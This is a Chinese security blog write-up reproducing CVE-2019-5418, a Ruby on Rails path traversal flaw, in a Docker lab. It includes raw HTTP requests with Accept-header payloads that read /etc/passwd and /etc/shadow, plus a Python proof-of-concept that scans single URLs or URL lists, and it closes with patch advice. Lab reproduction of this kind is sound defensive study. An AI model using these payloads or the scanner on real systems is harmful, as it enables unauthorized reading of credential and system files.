RubyonRails路径穿越与任意文件读取复现CVE20195418

Ruby on Rails路径穿越与任意文件读取复现

CVE-2019-5418

编写者&＃xff1a;thelostworld_fv

简介&＃xff1a;

Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架&＃xff0c;构建在 Ruby 语言之上。它被宣传为现有企业框架的一个替代&＃xff0c;而它的目标&＃xff0c;就是让 Web 开发方面的生活&＃xff0c;变得更轻松。

漏洞描述&＃xff1a;

这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图&＃xff0c;我们可以通过修改访问某控制器的请求包&＃xff0c;通过“../../../../”来达到路径穿越的目的&＃xff0c;然后再通过“{{”来进行模板查询路径的闭合&＃xff0c;使得所要访问的文件被当做外部模板来解析。

影响版本&＃xff1a;

Rails 全版本

其中修复版本&＃xff1a;

Rails 6.0.0.beta3&＃xff0c;5.2.2.1&＃xff0c;5.1.6.2&＃xff0c;5.0.7.2&＃xff0c;4.2.11.1

漏洞复现&＃xff08;Docker环境&＃xff09;&＃xff1a;

git clone https://github.com/vulhub/vulhub.git

cd /vulhub/rails/CVE-2019-5418

docker-compose up -d

docker 实验环境

启动环境

http://192.168.182.143:3000/ 访问ip&＃43;3000

请求robots&＃xff0c;Burp抓包

访问http://your-ip:3000/robots可见&＃xff0c;正常的robots.txt文件被读取出来。

利用漏洞&＃xff0c;发送如下数据包&＃xff0c;读取/etc/passwd&＃xff1a;

GET /robots HTTP/1.1

Host: your-ip:3000 Accept-Encoding: gzip, deflate

Accept: ../../../../../../../../etc/passwd{{

Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

读取etc/passwd

查看shadow文件

GET /robots HTTP/1.1

Host: 192.168.182.143:3000

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0

Accept-Language: en-US,en;q&＃61;0.5

Accept: ../../../../../../../../etc/shadow{{

Connection: close

Upgrade-Insecure-Requests: 1

还可以使用msf里面的攻击模块

测试

python脚本POC验证&＃xff1a;https://github.com/Paper-Pen/TimelineSec_POC

#CVE-2019-5418Ruby on Rails路径穿越与任意文件

# Usage&＃xff1a;python3 CVE-2019-5418.py -u url

# python3 CVE-2019-5418.py -f url.txt

import requests

import argparse

import sys

def rail_poc(url):

url &＃61; url&＃43;&＃39;/robots&＃39;

headers &＃61; {

"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0",

"Accept": "../../../../../../etc/passwd{{",

"Accept-Language": "zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2",

"Accept-Encoding": "gzip, deflate",

"DNT": "1",

"Connection": "close",

"Upgrade-Insecure-Requests": "1",

}

resp &＃61; requests.get(url,headers&＃61;headers).text

if "nologin" in resp:

print(url&＃43;"存在任意文件读取漏洞")

print(resp)

else:

print("不存在漏洞")

if __name__ &＃61;&＃61; &＃39;__main__&＃39;:

if len(sys.argv) &＃61;&＃61; 1:

print(&＃39;python3 CVE-2019-5418.py -u url&＃39;)

print(&＃39;python3 CVE-2019-5418.py -f url.txt&＃39;)

parser &＃61; argparse.ArgumentParser(description&＃61;"CVE-2019-5418.py -u 指定url -f 指定文本")

parser.add_argument(&＃39;-u&＃39;, &＃39;--url&＃39;, default&＃61;&＃39;&＃39;, help&＃61;"-u http://xx.xx.xx.xx")

parser.add_argument(&＃39;-f&＃39;, &＃39;--file&＃39;, default&＃61;&＃39;&＃39;, help&＃61;"-f xxx.txt")

args &＃61; parser.parse_args()

if args.url:

rail_poc(args.url)

if args.file:

with open(args.file,&＃39;r&＃39;) as f:

urls &＃61; f.readlines()

for url in urls:

url &＃61; url.strip(&＃39;\n&＃39;).strip(&＃39;\r&＃39;)

rail_poc(url)

修复建议&＃xff1a;

1. 使用已经修复该漏洞的版本

地址&＃xff1a;https://github.com/rails/rails/commit/f4c70c2222180b8d9d924f00af0c7fd632e26715

总结&＃xff1a;

1、注意那个msf的端口和最后的/etc/passwd的文件位置。

2、python的脚本修改了一下&＃xff0c;可以直观的看/etc/passwd的具体的文件内容。

&＃xff08;如果的批量还是注释返回的数据的打印&＃xff09;

3、最近工作闲暇漏洞复现一下&＃xff08;安全贵在坚持&＃xff09;&＃xff0c;如果有纰漏&＃xff0c;望大佬指正。

参考&＃xff1a;

https://mp.weixin.qq.com/s/Ok8vzfs1YUOahvU6AY2s5w

https://www.freebuf.com/vuls/199617.html

https://xz.aliyun.com/t/4448

个人知乎&＃xff1a;https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书&＃xff1a;https://www.jianshu.com/u/bf0e38a8d400